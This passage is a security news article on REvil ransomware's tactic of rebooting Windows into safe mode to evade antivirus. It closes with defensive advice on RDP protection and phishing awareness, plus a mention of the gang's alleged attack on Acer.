"'AstraZeneca' is used to run the ransomware sample itself in the safe mode, and 'Franceisshit' is used to run a command in the safe mode to make the PC run in normal mode after the next reboot," team of MalwareHunter tweeted. 

However it is not special, but the strategy is definitely uncommon, said the analysts. REvil implements this feature most likely as it will help the Ranking software to avoid detection by certain security devices because these functions allow attackers to encrypt the files in windows safe mode. 

"Causing a Windows computer to reboot in safe mode can disable software, potentially even antivirus or anti-ransomware software, that is working to keep your computer safe," says Erich Kron, security awareness advocate at the security firm KnowBe4. "This would then allow the attackers to make changes that may otherwise not be allowed in normal running mode." 

By tracking computers for unusual rebooting activities and by implementing successful data loss protection checks, organizations can deter malicious acts. Since REvil mainly uses compromised RDPs and mail phishing for distribution, it is essential for organizations, ideally through multi-factor authentication, to ensure that all Internet-accessible RDP instances are protected and that their employees are trained on high-quality security sensitives which can help them identify and track phishing attacks. 

Lately, the gang allegedly attacked Taiwan PC maker ‘Acer’ in an on-site version of Microsoft Exchange server, exploiting the unpatched ProxyLogon defect. 

The REvil Gang has gradually strengthened its malware and adapted various new methods of extortion. As of now, it frequently aims at bigger companies looking for significantly greater pay-outs, names, and shames via its devoted leak and targets cyber-insurance victims.